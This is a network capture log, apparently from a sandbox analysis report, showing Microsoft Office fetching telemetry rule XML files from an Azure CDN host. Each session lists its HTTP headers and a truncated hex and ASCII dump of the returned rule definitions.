                                                  2024-10-13 17:34:33 UTC192OUTGET /rules/rule701151v1s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-13 17:34:33 UTC563INHTTP/1.1 200 OK
                                                  Date: Sun, 13 Oct 2024 17:34:33 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 1401
                                                  Connection: close
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:27:45 GMT
                                                  ETag: "0x8DC582BE055B528"
                                                  x-ms-request-id: 44f36d90-201e-00aa-7dd7-1a3928000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241013T173433Z-17db6f7c8cfnqpbkckdefmqa44000000056g000000008zc1
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-10-13 17:34:33 UTC1401INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 31 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 78 74 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 78 74 41
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701151" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Text.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTextA


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  127192.168.2.44989313.107.246.45443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-13 17:34:33 UTC192OUTGET /rules/rule701150v1s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-13 17:34:33 UTC563INHTTP/1.1 200 OK
                                                  Date: Sun, 13 Oct 2024 17:34:33 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 1364
                                                  Connection: close
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                  ETag: "0x8DC582BE1223606"
                                                  x-ms-request-id: 8d6d9129-701e-0001-43c0-1ab110000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241013T173433Z-17db6f7c8cfspvtq2pgqb2w5k000000004yg00000000mk1d
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-10-13 17:34:33 UTC1364INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 31 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 78 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 78 74 41 6e 64 46 6f 6e 74 73 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701150" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Text" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTextAndFonts" S="Medium" /> <F T="2">


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  128192.168.2.44989413.107.246.45443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-13 17:34:33 UTC192OUTGET /rules/rule702201v1s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-13 17:34:33 UTC563INHTTP/1.1 200 OK
                                                  Date: Sun, 13 Oct 2024 17:34:33 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 1397
                                                  Connection: close
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:27:56 GMT
                                                  ETag: "0x8DC582BE7262739"
                                                  x-ms-request-id: c0002b7f-501e-0029-6e1c-1cd0b8000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241013T173433Z-17db6f7c8cf9wwz8ehu7c5p33g00000002g0000000007wbv
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-10-13 17:34:33 UTC1397INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 6c 4d 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.TellMe.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTel


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  129192.168.2.44989513.107.246.45443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-13 17:34:33 UTC192OUTGET /rules/rule702200v1s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-13 17:34:33 UTC563INHTTP/1.1 200 OK
                                                  Date: Sun, 13 Oct 2024 17:34:33 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 1360
                                                  Connection: close
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT
                                                  ETag: "0x8DC582BDDEB5124"
                                                  x-ms-request-id: fe1a38a0-a01e-0053-6ad8-1a8603000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241013T173433Z-17db6f7c8cfjxfnba42c5rukwg000000023g00000000d2gb
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-10-13 17:34:33 UTC1360INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 6c 4d 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c 6c 4d 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.TellMe" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTellMe" S="Medium" /> <F T="2">


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  130192.168.2.44989613.107.246.45443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-13 17:34:33 UTC192OUTGET /rules/rule700401v2s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-13 17:34:34 UTC563INHTTP/1.1 200 OK
                                                  Date: Sun, 13 Oct 2024 17:34:33 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 1403
                                                  Connection: close
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT
                                                  ETag: "0x8DC582BDCB4853F"
                                                  x-ms-request-id: 73142df5-301e-0052-1d1f-1b65d6000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241013T173433Z-17db6f7c8cfwtn5x6ye8p8q9m000000003wg000000001105
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-10-13 17:34:34 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 34 30 31 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700401" V="2" DC="SM" EN="Office.Telemetry.Event.Office.Telemetry.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  131192.168.2.44989713.107.246.45443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-13 17:34:33 UTC192OUTGET /rules/rule700400v2s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-13 17:34:34 UTC563INHTTP/1.1 200 OK
                                                  Date: Sun, 13 Oct 2024 17:34:33 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 1366
                                                  Connection: close
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:27:36 GMT
                                                  ETag: "0x8DC582BDB779FC3"
                                                  x-ms-request-id: 37d30e57-901e-0015-1248-1cb284000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241013T173433Z-17db6f7c8cfcrfgzd01a8emnyg00000002p000000000daur
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-10-13 17:34:34 UTC1366INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 34 30 30 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c 65 6d 65 74 72 79 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700400" V="2" DC="SM" EN="Office.Telemetry.Event.Office.Telemetry" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTelemetry" S="Medium" /> <F T="2


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  132192.168.2.44989813.107.246.45443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-13 17:34:34 UTC192OUTGET /rules/rule700351v1s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-13 17:34:34 UTC563INHTTP/1.1 200 OK
                                                  Date: Sun, 13 Oct 2024 17:34:34 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 1397
                                                  Connection: close
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                                  ETag: "0x8DC582BDFD43C07"
                                                  x-ms-request-id: 8f66ac67-401e-0035-1814-1c82d8000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241013T173434Z-17db6f7c8cfpm9w8b1ybgtytds000000030g00000000h3m9
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-10-13 17:34:34 UTC1397INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 33 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 79 73
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.System.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSys


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  133192.168.2.44989913.107.246.45443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-13 17:34:34 UTC192OUTGET /rules/rule700350v1s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-13 17:34:34 UTC563INHTTP/1.1 200 OK
                                                  Date: Sun, 13 Oct 2024 17:34:34 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 1360
                                                  Connection: close
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT
                                                  ETag: "0x8DC582BDD74D2EC"
                                                  x-ms-request-id: fa68fd7e-e01e-0099-0ae2-1ada8a000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241013T173434Z-17db6f7c8cf9c22xp43k2gbqvn00000002x00000000043k2
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-10-13 17:34:34 UTC1360INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 33 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 79 73 74 65 6d 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.System" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSystem" S="Medium" /> <F T="2">


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  134192.168.2.44990013.107.246.45443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-13 17:34:34 UTC192OUTGET /rules/rule703901v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-13 17:34:34 UTC563INHTTP/1.1 200 OK
                                                  Date: Sun, 13 Oct 2024 17:34:34 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 1427
                                                  Connection: close
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:27:53 GMT
                                                  ETag: "0x8DC582BE56F6873"
                                                  x-ms-request-id: 5892b05f-f01e-0085-23d9-1a88ea000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241013T173434Z-17db6f7c8cfqkqk8bn4ck6f720000000050g0000000069fv
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-10-13 17:34:34 UTC1427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 39 30 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703901" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ServiceabilityManager.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="Nexu


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  135192.168.2.44990113.107.246.45443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-13 17:34:34 UTC192OUTGET /rules/rule703900v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-13 17:34:34 UTC563INHTTP/1.1 200 OK
                                                  Date: Sun, 13 Oct 2024 17:34:34 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 1390
                                                  Connection: close
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:27:49 GMT
                                                  ETag: "0x8DC582BE3002601"
                                                  x-ms-request-id: b5288d5f-901e-008f-111b-1c67a6000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241013T173434Z-17db6f7c8cf8rgvlb86c9c0098000000038000000000d2pz
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-10-13 17:34:34 UTC1390INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 39 30 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 22 20 53 3d
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703900" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ServiceabilityManager" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenServiceabilityManager" S=


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  136192.168.2.44990213.107.246.45443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-13 17:34:34 UTC192OUTGET /rules/rule701501v1s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-13 17:34:34 UTC563INHTTP/1.1 200 OK
                                                  Date: Sun, 13 Oct 2024 17:34:34 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 1401
                                                  Connection: close
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:27:48 GMT
                                                  ETag: "0x8DC582BE2A9D541"
                                                  x-ms-request-id: d113afee-501e-008f-14e4-1a9054000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241013T173434Z-17db6f7c8cf96l6t7bwyfgbkhw0000000490000000005366
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
